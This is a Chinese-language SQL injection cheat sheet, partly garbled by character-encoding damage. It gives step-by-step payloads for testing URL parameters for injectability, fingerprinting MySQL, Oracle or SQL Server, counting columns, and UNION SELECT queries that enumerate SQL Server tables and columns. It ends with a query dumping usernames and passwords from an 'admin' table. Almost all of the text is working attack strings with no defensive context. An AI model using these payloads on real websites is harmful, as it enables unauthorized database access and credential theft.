1判斷網(wǎng)站是否是注入點(diǎn)
①? :包含?*=變量名的 URL??
?Integer:? ? ? ? ? ? ? ? ? ? ? ??
www.target.com/1.php?id=88? ? ? ? ? ? 正常 www.target.com/1.php?id=88-0? ? ? ? ? ? 同上 www.target.com/1.php?id=88-1? ? ? ? ? ? 異常? ??
?String:?
www.target.com/1.php?id=88? 'And 'a'='a? ? ? ? ? ? ? ? ? 正常 www.target.com/1.php?id=88? 'And 'a'='b? ? ? ? ? ? ? ? ? 異常? ? String?
www.target.com/1.php?id=88? ? ? ? ? ? ? 正常 www.target.com/1.php?id=88'%2b'? ? ? ? ? ? 同上 www.target.com/1.php?id=88'%2b's? ? ? ? ? ? 異常
2判斷數(shù)據(jù)庫(kù)是那種類型
數(shù)據(jù)庫(kù)判斷
MySQL
/*!%20s*/????????錯(cuò)誤則是MySQL
/*!40000%20s*/?錯(cuò)誤則版本大于4.0????? (大于4.0支持UNION注入)
/*!60000%20s*/?正常則版本小于6.0
/*!50130%20s*/?錯(cuò)誤則版本是5.1.30
/*pc*/??? //正常為MySQL
支持--pc,不支持;????? //Oracle
and exists(select @@version)-- //正常為SQL Server
判斷字段數(shù)
顯示數(shù)據(jù)庫(kù)信息字段數(shù)查找
id=1/**/Order/**/By/**/5/**/-- ? ? ? ? 正常則字段數(shù)≥5
id=1/**/Order/**/By/**/6/**/-- ? ? ? ? 錯(cuò)誤則字段數(shù)<6
判斷字段數(shù)據(jù)類型
id=1/**/union/**/all/**/select/**/NULL,NULL,NULL,NULL,NULL--
id=1/**/union/**/all/**/select/**/NULL,NULL,’test’,NULL,NULL--
正常說(shuō)明第3字段為字符型可以顯示SQL注入數(shù)據(jù)丧失。
顯示數(shù)據(jù)庫(kù)版本
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,NULL,@@version,NULL,NULL--
當(dāng)前庫(kù)名
and/**/1=2/**/union/**/all/**/select/**/NULL,db_name(),NULL,NULL,NULL from sysobjects--
指定庫(kù)表名
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from庫(kù)名..sysobjects where xtype='u' and name not in(select top 0 name from 庫(kù)名..sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
當(dāng)前庫(kù)查詢表名
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from sysobjects where xtype='u' and name not in(select top 1 name from sysobjects where xtype='u')),NULL,NULL,NULL from sysobjects--
字段名
從0開(kāi)始增加第二個(gè)top N的數(shù)字就可以遍歷admin表的字段名了
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 3 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
id=1/**/and/**/1=2/**/union/**/all/**/select/**/NULL,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 4 name from syscolumns where id in (select id from sysobjects where name='admin'))),NULL,NULL,NULL from sysobjects--
字段值
id=1 and 1=2 union all select id,username,password,NULL,NULL from admin--